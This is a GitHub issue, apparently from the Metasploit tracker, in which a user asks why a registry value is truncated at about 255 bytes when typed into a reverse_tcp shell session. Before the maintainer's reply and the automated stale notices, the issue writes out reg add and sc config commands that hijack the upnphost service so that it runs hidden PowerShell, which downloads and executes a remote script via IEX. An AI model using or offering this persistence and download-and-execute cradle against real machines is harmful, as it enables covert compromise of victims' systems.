Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

remote shell reg_key length bug? #7095

Closed
kainpark7894 opened this issue Jul 12, 2016 · 3 comments
Closed

remote shell reg_key length bug? #7095

kainpark7894 opened this issue Jul 12, 2016 · 3 comments
Labels
bug Stale Marks an issue as stale, to be closed if no action is taken

Comments

@kainpark7894
Copy link

kainpark7894 commented Jul 12, 2016
edited

sessions 1
shell
///////////input//////////
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\upnphost\ /v ImagePath /t REG_EXPAND_SZ /d "cmd.exe /c ping 127.0.0.1 -n 30 > nul & cmd.exe /c powershell.exe -nop -w hidden -c $p=new-object net.webclient;$p.proxy=[Net.WebRequest]::GetSystemWebProxy();$p.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $p.downloadstring('http://testsite.com/test.php')" /f

//////////output reg key value data//////////
cmd.exe /c ping 127.0.0.1 -n 30 > nul & cmd.exe /c powershell.exe -nop -w hidden -c $p=new-object net.webclient;$p.proxy=[Net.WebRequest]::GetSystem

//////////input//////////
sc config upnphost binpath= "cmd.exe /c ping 127.0.0.1 -n 30 > nul & cmd.exe /c powershell.exe -nop -w hidden -c $p=new-object net.webclient;$p.proxy=[Net.WebRequest]::GetSystemWebProxy();$p.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $p.downloadstring('http://testsite.com/test.php')"

//////////output reg key value data//////////
cmd.exe /c ping 127.0.0.1 -n 30 > nul & cmd.exe /c powershell.exe -nop -w hidden -c $p=new-object net.webclient;$p.proxy=[Net.WebRequest]::GetSystemWebProxy();$p.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX

x64/reverse_tcp sessions cmd shell

why reg_key value cut?(bug? or remote cmd length limit?)

regbug
@kainpark7894 kainpark7894 changed the title remote shell reg_key langth bug? remote shell reg_key length bug? Jul 12, 2016
@egypt
Copy link
Contributor

egypt commented Jul 27, 2016

It looks like you are pasting a large string into a cmd shell, is that the case? Is this a shell type session, or a shell inside a meterpreter session? What is the victim operating system?

The cutoff appears to be near 255 bytes, which is quite low for a max line length, but not unheard of.

@github-actions
Copy link

github-actions bot commented Jan 6, 2021

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Jan 6, 2021
@github-actions
Copy link

github-actions bot commented Feb 8, 2021

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot closed this as completed Feb 8, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Stale Marks an issue as stale, to be closed if no action is taken
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@egypt @dmohanty-r7 @kainpark7894